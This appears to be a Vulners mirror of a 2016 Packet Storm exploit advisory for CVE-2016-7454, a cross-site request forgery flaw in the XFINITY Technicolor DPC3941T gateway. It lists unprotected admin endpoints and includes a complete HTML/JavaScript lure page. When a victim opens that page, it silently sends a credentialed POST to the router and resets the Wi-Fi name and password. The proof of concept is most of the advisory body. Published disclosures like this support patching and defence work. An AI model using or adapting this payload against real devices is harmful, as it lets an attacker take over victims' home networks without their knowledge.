Vulners
Lucene search
XFINITY Gateway Technicolor DPC3941T Cross Site Request Forgery
🗓️ 12 Dec 2016 00:00:00Reported by Ayushman DuttaType 
packetstorm🔗 packetstormsecurity.com👁 159 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | XFINITY Gateway Technicolor DPC3941T Cross Site Request Forgery Vulnerability | 18 Dec 201600:00 | – | zdt |
| Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery Vulnerability | 1 Jan 201700:00 | – | zdt |
 | XFINITY Gateway Technicolor Cross-Site Request Forgery Vulnerability | 20 Dec 201600:00 | – | cnvd |
 | CVE-2016-7454 | 17 Dec 201603:34 | – | cve |
 | CVE-2016-7454 | 17 Dec 201603:34 | – | cvelist |
 | Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery | 9 Aug 201600:00 | – | exploitdb |
 | EUVD-2016-8307 | 7 Oct 202500:30 | – | euvd |
 | Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery | 9 Aug 201600:00 | – | exploitpack |
 | CVE-2016-7454 | 17 Dec 201603:59 | – | nvd |
 | Cross site request forgery (csrf) | 17 Dec 201603:59 | – | prion |
10
`# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco)
DPC3941T
# Date: 12/12/2016
# Exploit Author: Ayushman Dutta
# Version: dpc3941-P20-18-v303r20421733-160413a-CMCST
# CVE : CVE-2016-7454
The Device DPC3941T is vulnerable to CSRF and has no security on the entire
admin panel for it.
Some of the links are at:
<IP Address>/actionHandler/ajax_remote_management.php
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php
<IP Address>/actionHandler/ajax_at_a_glance.php
A simple HTML page with javascript on which the attacker lures the victim
can be used to change state in the application.
<html>
<head>
<title>
Lets CSRF Xfinity to change Wifi Password
</title>
</head>
<script>
function jsonreq() {
var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true",
"network_name":"MyName", "wireless_mode":"a,n,ac",
"security":"WPAWPA2_PSK_TKIPAES",
"channel_automatic":"true", "channel_number":"40",
"network_password":"password", "broadcastSSID":"true", "enableWMM":"true",
"ssid_number":"1"});
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;
xmlhttp.open("POST","http://10.0.0.1/actionHandler/ajaxSet_wireless_network_
configuration_edit.php", true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-
urlencoded");
xmlhttp.send(json_upload);
}
jsonreq();
</script>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Dec 2016 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.03329